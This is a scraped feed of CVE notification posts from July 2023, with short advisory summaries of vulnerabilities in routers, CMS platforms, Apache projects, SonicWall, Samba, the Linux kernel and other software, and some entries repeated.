🚨 CVE-2023-37786Multiple cross-site scripting (XSS) vulnerabilities in Geeklog v2.2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Mail Settings[backend], Mail Settings[host], Mail Settings[port] and Mail Settings[auth] parameters of the /admin/configuration.php.🎖@cveNotify |
|
| 2023-07-21 16:58:25 |
🚨 CVE-2023-37715Tenda F1202 V1.0BR_V1.2.0.20(408), FH1202_V1.2.0.19_EN were discovered to contain a stack overflow in the page parameter in the function frmL7ProtForm.🎖@cveNotify |
|
| 2023-07-21 16:58:24 |
🚨 CVE-2023-37716Tenda F1202 V1.0BR_V1.2.0.20(408) and FH1202_V1.2.0.19_EN, AC10 V1.0, AC1206 V1.0, AC7 V1.0, AC5 V1.0, and AC9 V3.0 were discovered to contain a stack overflow in the page parameter in the function fromNatStaticSetting.🎖@cveNotify |
|
| 2023-07-21 16:58:23 |
🚨 CVE-2023-37718Tenda F1202 V1.0BR_V1.2.0.20(408), FH1202_V1.2.0.19_EN were discovered to contain a stack overflow in the page parameter in the function fromSafeClientFilter.🎖@cveNotify |
|
| 2023-07-21 16:58:22 |
🚨 CVE-2023-37719Tenda F1202 V1.0BR_V1.2.0.20(408), FH1202_V1.2.0.19_EN were discovered to contain a stack overflow in the page parameter in the function fromP2pListFilter.🎖@cveNotify |
|
| 2023-07-21 16:58:19 |
🚨 CVE-2023-37717Tenda F1202 V1.0BR_V1.2.0.20(408) and FH1202_V1.2.0.19_EN, AC10 V1.0, AC1206 V1.0, AC7 V1.0, AC5 V1.0, and AC9 V3.0 were discovered to contain a stack overflow in the page parameter in the function fromDhcpListClient.🎖@cveNotify |
|
| 2023-07-21 16:58:18 |
🚨 CVE-2023-37721Tenda F1202 V1.0BR_V1.2.0.20(408), FH1202_V1.2.0.19_EN were discovered to contain a stack overflow in the page parameter in the function fromSafeMacFilter.🎖@cveNotify |
|
| 2023-07-21 16:58:17 |
🚨 CVE-2023-3484An issue has been discovered in GitLab EE affecting all versions starting from 12.8 before 15.11.11, all versions starting from 16.0 before 16.0.7, all versions starting from 16.1 before 16.1.2. An attacker could change the name or path of a public top-level group in certain situations.🎖@cveNotify |
|
| 2023-07-21 14:58:31 |
🚨 CVE-2023-35086It is identified a format string vulnerability in ASUS RT-AX56U V2 & RT-AC86U. This vulnerability is caused by directly using input as a format string when calling syslog in logmessage_normal function, in the do_detwan_cgi module of httpd. An unauthenticated remote attacker without privilege can exploit this vulnerability to perform remote arbitrary code execution, arbitrary system operation or disrupt service.This issue affects RT-AX56U V2: 3.0.0.4.386_50460; RT-AC86U: 3.0.0.4_386_51529.🎖@cveNotify |
|
| 2023-07-21 14:58:30 |
🚨 CVE-2023-3802A vulnerability was found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /Controller/Ajaxfileupload.ashx. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. VDB-235070 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 14:58:29 |
🚨 CVE-2023-3801A vulnerability was found in IBOS OA 4.5.5. It has been declared as critical. Affected by this vulnerability is the function actionEdit of the file ?r=officialdoc/officialdoc/edit of the component Mobile Notification Handler. The manipulation leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-235069 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 14:58:25 |
🚨 CVE-2023-3803A vulnerability classified as problematic has been found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This affects an unknown part of the file /Service/ImageStationDataService.asmx of the component File Name Handler. The manipulation leads to insufficiently random values. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235071. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 14:58:24 |
🚨 CVE-2023-3804A vulnerability classified as problematic was found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This vulnerability affects unknown code of the file /Service/FileHandler.ashx. The manipulation of the argument userFile leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235072. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 14:58:23 |
🚨 CVE-2023-3805A vulnerability, which was classified as critical, has been found in Xiamen Four Letter Video Surveillance Management System up to 20230712. This issue affects some unknown processing in the library UserInfoAction.class of the component Login. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235073 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 14:58:22 |
🚨 CVE-2023-25836There is a Cross-site Scripting vulnerability in Esri Portal Sites in versions 10.8.1 – 10.9 that may allow a remote, authenticated attacker to create a crafted link which when clicked could potentially execute arbitrary JavaScript code in the victims browser. The privileges required to execute this attack are low.🎖@cveNotify |
|
| 2023-07-21 14:58:19 |
🚨 CVE-2023-38632async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in tcpsocket.hpp when processing malformed TCP packets.🎖@cveNotify |
|
| 2023-07-21 14:58:18 |
🚨 CVE-2023-3806A vulnerability, which was classified as critical, was found in SourceCodester House Rental and Property Listing System 1.0. Affected is an unknown function of the file btn_functions.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-235074 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-21 14:58:17 |
🚨 CVE-2023-37291Galaxy Software Services Vitals ESP is vulnerable to using a hard-coded encryption key. An unauthenticated remote attacker can generate a valid token parameter and exploit this vulnerability to access system to operate processes and access data.This issue affects Vitals ESP: from 3.0.8 through 6.2.0.🎖@cveNotify |
|
| 2023-07-21 14:58:13 |
🚨 CVE-2023-3809A vulnerability was found in Hospital Management System 1.0. It has been classified as critical. This affects an unknown part of the file patient.php. The manipulation of the argument address leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235077 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-21 14:58:12 |
🚨 CVE-2023-32625Cross-site request forgery (CSRF) vulnerability in TS Webfonts for SAKURA 3.1.2 and earlier allows a remote unauthenticated attacker to hijack the authentication of a user and to change settings by having a user view a malicious page.🎖@cveNotify |
|
| 2023-07-21 12:58:13 |
🚨 CVE-2023-36543Apache Airflow, versions before 2.6.3, has a vulnerability where an authenticated user can use crafted input to make the current request hang. It is recommended to upgrade to a version that is not affected🎖@cveNotify |
|
| 2023-07-21 10:58:25 |
🚨 CVE-2023-35087It is identified a format string vulnerability in ASUS RT-AX56U V2 & RT-AC86U. This vulnerability is caused by lacking validation for a specific value when calling cm_processChangedConfigMsg in ccm_processREQ_CHANGED_CONFIG function in AiMesh system. An unauthenticated remote attacker can exploit this vulnerability without privilege to perform remote arbitrary code execution, arbitrary system operation or disrupt service.This issue affects RT-AX56U V2: 3.0.0.4.386_50460; RT-AC86U: 3.0.0.4_386_51529.🎖@cveNotify |
|
| 2023-07-21 10:58:24 |
🚨 CVE-2023-28729A type confusion vulnerability in Panasonic Control FPWIN Pro versions 7.6.0.3 and all previous versions may allow arbitrary code execution when opening specially crafted project files.🎖@cveNotify |
|
| 2023-07-21 10:58:23 |
🚨 CVE-2023-28730A memory corruption vulnerability Panasonic Control FPWIN Pro versions 7.6.0.3 and all previous versions may allow arbitrary code execution when opening specially crafted project files.🎖@cveNotify |
|
| 2023-07-21 10:58:19 |
🚨 CVE-2023-32478Dell PowerStore versions prior to 3.5.0.1 contain an insertion of sensitive information into log file vulnerability. A high privileged malicious user could potentially exploit this vulnerability, leading to sensitive information disclosure.🎖@cveNotify |
|
| 2023-07-21 10:58:18 |
🚨 CVE-2023-3815A vulnerability, which was classified as problematic, has been found in y_project RuoYi up to 4.7.7. Affected by this issue is the function uploadFilesPath of the component File Upload. The manipulation of the argument originalFilenames leads to cross site scripting. The attack may be launched remotely. VDB-235118 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-21 05:58:51 |
🚨 CVE-2023-33460There's a memory leak in yajl 2.1.0 with use of yajl_tree_parse function. which will cause out-of-memory in server and cause crash.🎖@cveNotify |
|
| 2023-07-21 05:58:50 |
🚨 CVE-2023-0003A file disclosure vulnerability in the Palo Alto Networks Cortex XSOAR server software enables an authenticated user with access to the web interface to read local files from the server.🎖@cveNotify |
|
| 2023-07-21 05:58:48 |
🚨 CVE-2023-3808A vulnerability was found in Hospital Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file patientforgotpassword.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235076.🎖@cveNotify |
|
| 2023-07-21 05:58:46 |
🚨 CVE-2023-3807A vulnerability has been found in Campcodes Beauty Salon Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file edit_product.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235075.🎖@cveNotify |
|
| 2023-07-21 05:58:44 |
🚨 CVE-2023-3813The Jupiter X Core plugin for WordPress is vulnerable to arbitrary file downloads in versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to download the contents of arbitrary files on the server, which can contain sensitive information. The requires the premium version of the plugin to be activated.🎖@cveNotify |
|
| 2023-07-21 05:58:43 |
🚨 CVE-2023-37290InfoDoc Document On-line Submission and Approval System lacks sufficient restrictions on the available tags within its HTML to PDF conversion function, and allowing an unauthenticated attackers to load remote or local resources through HTML tags such as iframe. This vulnerability allows unauthenticated remote attackers to perform Server-Side Request Forgery (SSRF) attacks, gaining unauthorized access to arbitrary system files and uncovering the internal network topology.🎖@cveNotify |
|
| 2023-07-21 05:58:41 |
🚨 CVE-2023-3805A vulnerability, which was classified as critical, has been found in Xiamen Four Letter Video Surveillance Management System up to 20230712. This issue affects some unknown processing in the library UserInfoAction.class of the component Login. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235073 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 05:58:39 |
🚨 CVE-2023-38632async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in tcpsocket.hpp when processing malformed TCP packets.🎖@cveNotify |
|
| 2023-07-21 05:58:38 |
🚨 CVE-2023-3806A vulnerability, which was classified as critical, was found in SourceCodester House Rental and Property Listing System 1.0. Affected is an unknown function of the file btn_functions.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-235074 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-21 05:58:36 |
🚨 CVE-2023-32624Cross-site scripting vulnerability in TS Webfonts for SAKURA 3.1.0 and earlier allows a remote unauthenticated attacker to inject an arbitrary script.🎖@cveNotify |
|
| 2023-07-21 05:58:34 |
🚨 CVE-2023-3803A vulnerability classified as problematic has been found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This affects an unknown part of the file /Service/ImageStationDataService.asmx of the component File Name Handler. The manipulation leads to insufficiently random values. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235071. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 05:58:32 |
🚨 CVE-2023-3803A vulnerability classified as problematic has been found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This affects an unknown part of the file /Service/ImageStationDataService.asmx of the component File Name Handler. The manipulation leads to insufficiently random values. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235071. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 05:58:31 |
🚨 CVE-2023-3804A vulnerability classified as problematic was found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This vulnerability affects unknown code of the file /Service/FileHandler.ashx. The manipulation of the argument userFile leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235072. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 05:58:29 |
🚨 CVE-2023-3804A vulnerability classified as problematic was found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This vulnerability affects unknown code of the file /Service/FileHandler.ashx. The manipulation of the argument userFile leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235072. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 05:58:27 |
🚨 CVE-2023-32625Cross-site request forgery (CSRF) vulnerability in TS Webfonts for SAKURA 3.1.2 and earlier allows a remote unauthenticated attacker to hijack the authentication of a user and to change settings by having a user view a malicious page.🎖@cveNotify |
|
| 2023-07-21 05:58:25 |
🚨 CVE-2023-37289It is identified a vulnerability of Unrestricted Upload of File with Dangerous Type in the file uploading function in InfoDoc Document On-line Submission and Approval System, which allows an unauthenticated remote attacker can exploit this vulnerability without logging system to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service. This issue affects Document On-line Submission and Approval System: 22547, 22567.🎖@cveNotify |
|
| 2023-07-21 05:58:24 |
🚨 CVE-2023-3802A vulnerability was found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /Controller/Ajaxfileupload.ashx. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. VDB-235070 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 05:58:22 |
🚨 CVE-2023-3801A vulnerability was found in IBOS OA 4.5.5. It has been declared as critical. Affected by this vulnerability is the function actionEdit of the file ?r=officialdoc/officialdoc/edit of the component Mobile Notification Handler. The manipulation leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-235069 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-21 05:58:20 |
🚨 CVE-2023-25835There is a Cross-site Scripting vulnerability in Esri Portal Sites in versions 10.8.1 – 11.1 that may allow a remote, authenticated attacker to create a crafted link which when clicked could potentially execute arbitrary JavaScript code in the victims browser. The privileges required to execute this attack are high.🎖@cveNotify |
|
| 2023-07-21 05:58:19 |
🚨 CVE-2023-3799A vulnerability was found in IBOS OA 4.5.5 and classified as critical. This issue affects some unknown processing of the file ?r=article/category/del of the component Delete Category Handler. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235067. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-20 20:58:34 |
🚨 CVE-2023-37602An arbitrary file upload vulnerability in the component /workplace#!explorer of Alkacon OpenCMS v15.0 allows attackers to execute arbitrary code via uploading a crafted PNG file.🎖@cveNotify |
|
| 2023-07-20 20:58:33 |
🚨 CVE-2023-38617Office Suite Premium Version v10.9.1.42602 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the filter parameter at /api?path=files.🎖@cveNotify |
|
| 2023-07-20 20:58:32 |
🚨 CVE-2023-37601Office Suite Premium v10.9.1.42602 was discovered to contain a local file inclusion (LFI) vulnerability via the component /etc/hosts.🎖@cveNotify |
|
| 2023-07-20 20:58:28 |
🚨 CVE-2023-37164Diafan CMS v6.0 was discovered to contain a reflected cross-site scripting via the cat_id parameter at /shop/?module=shop&action=search.🎖@cveNotify |
|
| 2023-07-20 20:58:27 |
🚨 CVE-2023-34129Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in SonicWall GMS and Analytics allows an authenticated remote attacker to traverse the directory and extract arbitrary files using Zip Slip method to any location on the underlying filesystem with root privileges. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-07-20 20:58:26 |
🚨 CVE-2023-21260In notification access permission dialog box, malicious application can embedded a very long service label that overflow the original user prompt and possibly contains mis-leading information to be appeared as a system message for user confirmation.🎖@cveNotify |
|
| 2023-07-20 20:58:23 |
🚨 CVE-2023-35694In DMPixelLogger_ProcessDmCommand of DMPixelLogger.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-20 20:58:22 |
🚨 CVE-2023-35691there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-20 20:58:21 |
🚨 CVE-2023-35693In incfs_kill_sb of fs/incfs/vfs.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-20 20:58:17 |
🚨 CVE-2023-37728Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2023-07-20 20:58:16 |
🚨 CVE-2023-38334Omnis Studio 10.22.00 has incorrect access control. It advertises an irreversible feature for locking classes within Omnis libraries: it should be no longer possible to delete, view, change, copy, rename, duplicate, or print a locked class. Due to implementation issues, locked classes in Omnis libraries can be unlocked, and thus further analyzed and modified by Omnis Studio. This allows for further analyzing and also deleting, viewing, changing, copying, renaming, duplicating, or printing previously locked Omnis classes. This violates the expected behavior of an "irreversible operation."🎖@cveNotify |
|
| 2023-07-20 18:58:45 |
🚨 CVE-2023-37627Code-projects Online Restaurant Management System 1.0 is vulnerable to SQL Injection. Through SQL injection, an attacker can bypass the admin panel and view order records, add items, delete items etc.🎖@cveNotify |
|
| 2023-07-20 18:58:44 |
🚨 CVE-2023-36543Apache Airflow, versions before 2.6.3, has a vulnerability where an authenticated user can use crafted input to make the current request hang. It is recommended to upgrade to a version that is not affected🎖@cveNotify |
|
| 2023-07-20 18:58:43 |
🚨 CVE-2023-38046A vulnerability exists in Palo Alto Networks PAN-OS software that enables an authenticated administrator with the privilege to commit a specifically created configuration to read local files and resources from the system.🎖@cveNotify |
|
| 2023-07-20 18:58:42 |
🚨 CVE-2023-3618A flaw was found in libtiff. A specially crafted tiff file can lead to a segmentation fault due to a buffer overflow in the Fax3Encode function in libtiff/tif_fax3.c, resulting in a denial of service.🎖@cveNotify |
|
| 2023-07-20 18:58:38 |
🚨 CVE-2023-37471Open Access Management (OpenAM) is an access management solution that includes Authentication, SSO, Authorization, Federation, Entitlements and Web Services Security. OpenAM up to version 14.7.2 does not properly validate the signature of SAML responses received as part of the SAMLv1.x Single Sign-On process. Attackers can use this fact to impersonate any OpenAM user, including the administrator, by sending a specially crafted SAML response to the SAMLPOSTProfileServlet servlet. This problem has been patched in OpenAM 14.7.3-SNAPSHOT and later. User unable to upgrade should comment servlet `SAMLPOSTProfileServlet` from their pom file. See the linked GHSA for details.🎖@cveNotify |
|
| 2023-07-20 18:58:37 |
🚨 CVE-2023-3790A vulnerability has been found in Boom CMS 8.0.7 and classified as problematic. Affected by this vulnerability is the function add of the component assets-manager. The manipulation of the argument title/description leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235057 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-20 18:58:36 |
🚨 CVE-2023-35908Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows unauthorized read access to a DAG through the URL. It is recommended to upgrade to a version that is not affected🎖@cveNotify |
|
| 2023-07-20 18:58:35 |
🚨 CVE-2023-3106A NULL pointer dereference vulnerability was found in netlink_dump. This issue can occur when the Netlink socket receives the message(sendmsg) for the XFRM_MSG_GETSA, XFRM_MSG_GETPOLICY type message, and the DUMP flag is set and can cause a denial of service or possibly another unspecified impact. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although it is unlikely.🎖@cveNotify |
|
| 2023-07-20 18:58:34 |
🚨 CVE-2023-25606An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability [CWE-23] in FortiAnalyzer and FortiManager management interface 7.2.0 through 7.2.1, 7.0.0 through 7.0.5, 6.4 all versions may allow a remote and authenticated attacker to retrieve arbitrary files from the underlying filesystem via specially crafted web requests.🎖@cveNotify |
|
| 2023-07-20 18:58:30 |
🚨 CVE-2022-23447An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability [CWE-22] in FortiExtender management interface 7.0.0 through 7.0.3, 4.2.0 through 4.2.4, 4.1.1 through 4.1.8, 4.0.0 through 4.0.2, 3.3.0 through 3.3.2, 3.2.1 through 3.2.3, 5.3 all versions may allow an unauthenticated and remote attacker to retrieve arbitrary files from the underlying filesystem via specially crafted web requests.🎖@cveNotify |
|
| 2023-07-20 18:58:29 |
🚨 CVE-2023-31007Improper Authentication vulnerability in Apache Software Foundation Apache Pulsar Broker allows a client to stay connected to a broker after authentication data expires if the client connected through the Pulsar Proxy when the broker is configured with authenticateOriginalAuthData=false or if a client connects directly to a broker with a specially crafted connect command when the broker is configured with authenticateOriginalAuthData=false.This issue affects Apache Pulsar: through 2.9.4, from 2.10.0 through 2.10.3, 2.11.0.2.9 Pulsar Broker users should upgrade to at least 2.9.5.2.10 Pulsar Broker users should upgrade to at least 2.10.4.2.11 Pulsar Broker users should upgrade to at least 2.11.1.3.0 Pulsar Broker users are unaffected.Any users running the Pulsar Broker for 2.8.* and earlier should upgrade to one of the above patched versions.🎖@cveNotify |
|
| 2023-07-20 18:58:28 |
🚨 CVE-2023-30429Incorrect Authorization vulnerability in Apache Software Foundation Apache Pulsar.This issue affects Apache Pulsar: before 2.10.4, and 2.11.0.When a client connects to the Pulsar Function Worker via the Pulsar Proxy where the Pulsar Proxy uses mTLS authentication to authenticate with the Pulsar Function Worker, the Pulsar Function Worker incorrectly performs authorization by using the Proxy's role for authorization instead of the client's role, which can lead to privilege escalation, especially if the proxy is configured with a superuser role.The recommended mitigation for impacted users is to upgrade the Pulsar Function Worker to a patched version.2.10 Pulsar Function Worker users should upgrade to at least 2.10.4.2.11 Pulsar Function Worker users should upgrade to at least 2.11.1.3.0 Pulsar Function Worker users are unaffected.Any users running the Pulsar Function Worker for 2.9.* and earlier should upgrade to one of the above patched versions.🎖@cveNotify |
|
| 2023-07-20 18:58:27 |
🚨 CVE-2023-38203Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-07-20 18:58:26 |
🚨 CVE-2023-3789A vulnerability, which was classified as problematic, was found in PaulPrinting CMS 2018. Affected is an unknown function of the file /account/delivery of the component Search. The manipulation of the argument s leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235056.🎖@cveNotify |
|
| 2023-07-20 18:58:22 |
🚨 CVE-2023-32476Dell Hybrid Client version 2.0 contains a Sensitive Data Exposure vulnerability. An unauthenticated malicious user on the device can access hard coded secrets in javascript files.🎖@cveNotify |
|
| 2023-07-20 18:58:21 |
🚨 CVE-2022-2127An out-of-bounds read vulnerability was found in Samba due to insufficient length checks in winbindd_pam_auth_crap.c. When performing NTLM authentication, the client replies to cryptographic challenges back to the server. These replies have variable lengths, and Winbind fails to check the lan manager response length. When Winbind is used for NTLM authentication, a maliciously crafted request can trigger an out-of-bounds read in Winbind, possibly resulting in a crash.🎖@cveNotify |
|
| 2023-07-20 18:58:20 |
🚨 CVE-2023-34966An infinite loop vulnerability was found in Samba's mdssvc RPC service for Spotlight. When parsing Spotlight mdssvc RPC packets sent by the client, the core unmarshalling function sl_unpack_loop() did not validate a field in the network packet that contains the count of elements in an array-like structure. By passing 0 as the count value, the attacked function will run in an endless loop consuming 100% CPU. This flaw allows an attacker to issue a malformed RPC request, triggering an infinite loop, resulting in a denial of service condition.🎖@cveNotify |
|
| 2023-07-20 18:58:19 |
🚨 CVE-2023-34967A Type Confusion vulnerability was found in Samba's mdssvc RPC service for Spotlight. When parsing Spotlight mdssvc RPC packets, one encoded data structure is a key-value style dictionary where the keys are character strings, and the values can be any of the supported types in the mdssvc protocol. Due to a lack of type checking in callers of the dalloc_value_for_key() function, which returns the object associated with a key, a caller may trigger a crash in talloc_get_size() when talloc detects that the passed-in pointer is not a valid talloc pointer. With an RPC worker process shared among multiple client connections, a malicious client or attacker can trigger a process crash in a shared RPC mdssvc worker process, affecting all other clients this worker serves.🎖@cveNotify |
|
| 2023-07-20 16:58:48 |
🚨 CVE-2023-3787A vulnerability classified as problematic was found in Codecanyon Tiva Events Calender 1.4. This vulnerability affects unknown code. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235054 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-20 16:58:47 |
🚨 CVE-2023-38408The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system. (Code in /usr/lib is not necessarily safe for loading into ssh-agent.) NOTE: this issue exists because of an incomplete fix for CVE-2016-10009.🎖@cveNotify |
|
| 2023-07-20 16:58:46 |
🚨 CVE-2023-1611A use-after-free flaw was found in btrfs_search_slot in fs/btrfs/ctree.c in btrfs in the Linux Kernel.This flaw allows an attacker to crash the system and possibly cause a kernel information lea🎖@cveNotify |
|
| 2023-07-20 16:58:44 |
🚨 CVE-2023-1380A slab-out-of-bound read problem was found in brcmf_get_assoc_ies in drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c in the Linux Kernel. This issue could occur when assoc_info->req_len data is bigger than the size of the buffer, defined as WL_EXTRA_BUF_MAX, leading to a denial of service.🎖@cveNotify |
|
| 2023-07-20 16:58:43 |
🚨 CVE-2022-33742Linux disk/nic frontends data leaks T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally the granularity of the grant table doesn't allow sharing less than a 4K page, leading to unrelated data residing in the same 4K page as data shared with a backend being accessible by such backend (CVE-2022-33741, CVE-2022-33742).🎖@cveNotify |
|
| 2023-07-20 16:58:41 |
🚨 CVE-2022-33741Linux disk/nic frontends data leaks T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally the granularity of the grant table doesn't allow sharing less than a 4K page, leading to unrelated data residing in the same 4K page as data shared with a backend being accessible by such backend (CVE-2022-33741, CVE-2022-33742).🎖@cveNotify |
|
| 2023-07-20 16:58:40 |
🚨 CVE-2022-26365Linux disk/nic frontends data leaks T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally the granularity of the grant table doesn't allow sharing less than a 4K page, leading to unrelated data residing in the same 4K page as data shared with a backend being accessible by such backend (CVE-2022-33741, CVE-2022-33742).🎖@cveNotify |
|
| 2023-07-20 16:58:37 |
🚨 CVE-2022-33740Linux disk/nic frontends data leaks T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally the granularity of the grant table doesn't allow sharing less than a 4K page, leading to unrelated data residing in the same 4K page as data shared with a backend being accessible by such backend (CVE-2022-33741, CVE-2022-33742).🎖@cveNotify |
|
| 2023-07-20 16:58:33 |
🚨 CVE-2021-43666A Denial of Service vulnerability exists in mbed TLS 3.0.0 and earlier in the mbedtls_pkcs12_derivation function when an input password's length is 0.🎖@cveNotify |
|
| 2023-07-20 16:58:31 |
🚨 CVE-2023-34128Tomcat application credentials are hardcoded in SonicWall GMS and Analytics configuration file. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-07-20 16:58:28 |
🚨 CVE-2023-34124The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-07-20 16:58:26 |
🚨 CVE-2023-38066In JetBrains TeamCity before 2023.05.1 reflected XSS via the Referer header was possible during artifact downloads🎖@cveNotify |
|
| 2023-07-20 16:58:22 |
🚨 CVE-2023-37950A missing permission check in Jenkins mabl Plugin 0.0.46 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-07-20 16:58:21 |
🚨 CVE-2023-34126Vulnerability in SonicWall GMS and Analytics allows an authenticated attacker to upload files on the underlying filesystem with root privileges. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-07-20 16:58:20 |
🚨 CVE-2023-38065In JetBrains TeamCity before 2023.05.1 stored XSS while viewing the build log was possible🎖@cveNotify |
|
| 2023-07-20 16:58:17 |
